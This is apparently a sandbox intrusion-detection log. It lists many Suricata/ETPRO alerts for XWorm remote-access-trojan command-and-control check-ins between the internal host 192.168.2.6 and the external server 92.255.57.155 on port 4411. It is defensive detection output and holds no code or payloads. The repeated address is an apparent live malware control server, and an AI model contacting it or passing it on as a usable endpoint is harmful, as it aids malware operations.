                                  2024-12-18T08:17:00.875375+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:00.971617+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:00.994906+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.448153+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.537876+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:01.567748+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.639169+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.642038+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:01.703951+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:01.727953+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.823599+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:02.719202+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:02.952185+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:02.961974+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.029984+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.082053+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.143231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.201778+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.268126+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.326101+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.512566+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.613897+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.771577+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.773877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:04.443381+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:04.704070+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:04.749398+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:04.895113+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:05.038465+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:05.065666+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:05.094855+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:05.094986+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:05.252728+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:05.321570+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:05.349183+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:05.443227+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:05.645241+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:05.649883+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:06.438261+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:06.440028+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:06.629264+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:06.824374+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:08.390846+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:08.391954+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:08.624097+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:08.624966+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:08.702872+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:08.747170+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:10.531625+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:10.535601+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:10.722531+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:10.774991+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:10.846279+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:10.901928+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:11.132177+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:11.157785+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:11.594488+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:11.597907+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:12.527404+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:12.527753+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:12.641066+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:12.666990+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:12.813169+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:12.858955+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:12.934095+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:13.137554+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:13.189536+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:13.606588+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:13.608910+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:14.329044+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:14.503577+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:14.592855+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:14.694434+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:14.712473+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:14.885438+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:14.888749+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:15.005307+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:15.013724+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:15.252311+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:15.722900+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:15.726905+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:15.956038+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:15.982984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:16.332447+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:16.574935+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:18.796711+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:18.797777+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:19.399329+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:19.497918+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:20.266004+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:20.267114+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:20.866720+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:20.872027+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:21.141145+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:21.142643+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:24.143750+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:24.376060+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:24.567006+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:24.686941+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:24.758192+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:24.758271+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:25.074712+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:25.388644+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:25.572080+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:26.337618+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:26.528808+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:26.648790+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:26.719925+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:27.032137+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:27.151957+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:27.460006+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:27.460864+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:28.636119+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:28.826374+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:28.978078+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:29.005410+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:29.017473+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:29.018032+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:29.098068+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:29.196404+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:29.217880+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:29.288806+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:29.337825+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:29.522691+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:29.868567+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:29.869548+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:30.160850+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:30.472926+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:30.473988+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:30.659332+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:30.661142+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:30.785671+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:30.796469+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:32.515388+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:32.563436+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:32.706363+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:32.826183+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:32.897453+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:32.897617+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:32.961063+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:33.208458+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:33.241746+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:33.432768+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:33.565993+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:34.375449+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:34.417678+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:34.610544+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:34.611421+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:34.800416+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:34.850456+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:35.215702+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:35.216700+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:35.406916+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:35.408863+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:35.528667+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:35.657022+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:35.721986+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:35.782028+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:36.007975+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:36.105385+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:36.198606+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:36.225137+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:37.188412+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:37.348974+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:37.440624+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:37.539654+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:37.560192+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:37.631769+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:37.679847+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:37.867963+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:37.869345+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:38.567528+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:38.568424+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:38.763720+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:38.764531+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:40.109606+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:40.110504+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:40.344360+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:40.345812+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:40.955982+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
